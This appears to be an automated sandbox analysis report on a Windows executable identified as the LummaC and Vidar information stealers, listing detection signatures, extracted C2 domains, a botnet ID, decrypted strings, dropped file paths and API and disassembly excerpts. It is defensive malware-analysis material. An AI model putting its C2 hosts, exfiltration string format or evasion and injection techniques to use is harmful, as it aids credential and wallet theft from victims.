Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525478
MD5: 2ab4c1827edd0f4dc810cf0f9b3bd30d
SHA1: a32347945672d6c1b7bd275f2d62b62d9749bebb
SHA256: c7a9b126d27a142ad49c3b46591716348393efae2bf563df648701827bd7f80c
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Found malware configuration
Source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "566ac7bdeaf763bbaf70aa6d5667c804"}
Source: 8.2.GCGHCBKFCF.exe.300000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["soldiefieop.site", "chorusarorp.site", "absorptioniw.site", "questionsmw.stor", "treatynreit.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site"], "Build id": "H8NgCl--"}
Multi AV Scanner detection for domain / URL
Source: playd.healthnlife.pk Virustotal: Detection: 8% Perma Link
Source: cowod.hopto.org Virustotal: Detection: 9% Perma Link
Source: questionsmw.store Virustotal: Detection: 16% Perma Link
Source: soldiefieop.site Virustotal: Detection: 15% Perma Link
Source: http://cowod.hopto.org Virustotal: Detection: 9% Perma Link
Source: https://beearvagueo.site/; Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 30% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\GCGHCBKFCF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: absorptioniw.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: mysterisop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: snarlypagowo.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: treatynreit.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: chorusarorp.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: abnomalrkmu.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: soldiefieop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: questionsmw.stor
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: soldiefieop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: H8NgCl--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 1_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 1_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6CAB6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:57016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.202:443 -> 192.168.2.4:57019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57213 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2500700972.0000000035EBC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2495526270.0000000029FDE000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C73FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_005C73FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD37
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003173FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_003173FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_005D9385
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_005D9385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 1_2_004014AD
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A004
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A08D
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h] 8_2_003340E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh] 8_2_003340E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033C16C
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [edx], ax 8_2_00352158
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+20h] 8_2_0033E1F1
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A3E0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033E448
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A3D9
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx ecx, word ptr [edi] 8_2_003524F8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebx, eax 8_2_00332558
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebp, eax 8_2_00332558
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp al, 2Eh 8_2_003546B7
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 8_2_003526A8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp eax 8_2_00352778
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_003549E3
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_0032CA28
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AA72
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036EABD
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036EB32
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_0036CB68
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp dword ptr [00451A70h] 8_2_00356C40
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_00348C49
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 8_2_0033AD3A
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00356D18
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h] 8_2_0032ED08
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx esi, byte ptr [edx+ebp] 8_2_0032ED08
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 8_2_00354E06
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 8_2_0033AE05
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_00342ED8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_0034EEC8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_00348FA8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov esi, ebx 8_2_00370F90
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0033B034
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00351018
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036D063
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 8_2_003470AE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0034F128
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0034F128
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+34h], edx 8_2_003291CA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033D225
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033D215
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+08h], ecx 8_2_0032925D
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+00000688h] 8_2_003452C4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then dec ebx 8_2_003672C8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h 8_2_003673B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh 8_2_003673B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_003553BA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah 8_2_003573A0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+50h], 00000000h 8_2_0033D394
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_003493D1
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 8_2_0036F508
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_00369578
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+000000D0h] 8_2_0034560A
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+68h] 8_2_0036F6F8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h] 8_2_003377EF
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 8_2_003558E2
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_003718E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_003638C8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 8_2_0036BA38
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h 8_2_00355A23
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_00371A78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp dword ptr [0045042Ch] 8_2_00347A4B
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 8_2_00347A89
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_0032DAD8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00337AD8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00353B2E
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033BBF4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 8_2_00371BF8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 8_2_00371BF8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0036BC78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp eax, C0000004h 8_2_00345CD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then xor eax, eax 8_2_00353DCE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp eax 8_2_0033DE12
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h 8_2_0034FE00
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00335E98
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 8_2_00335E98
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h 8_2_0036BF18
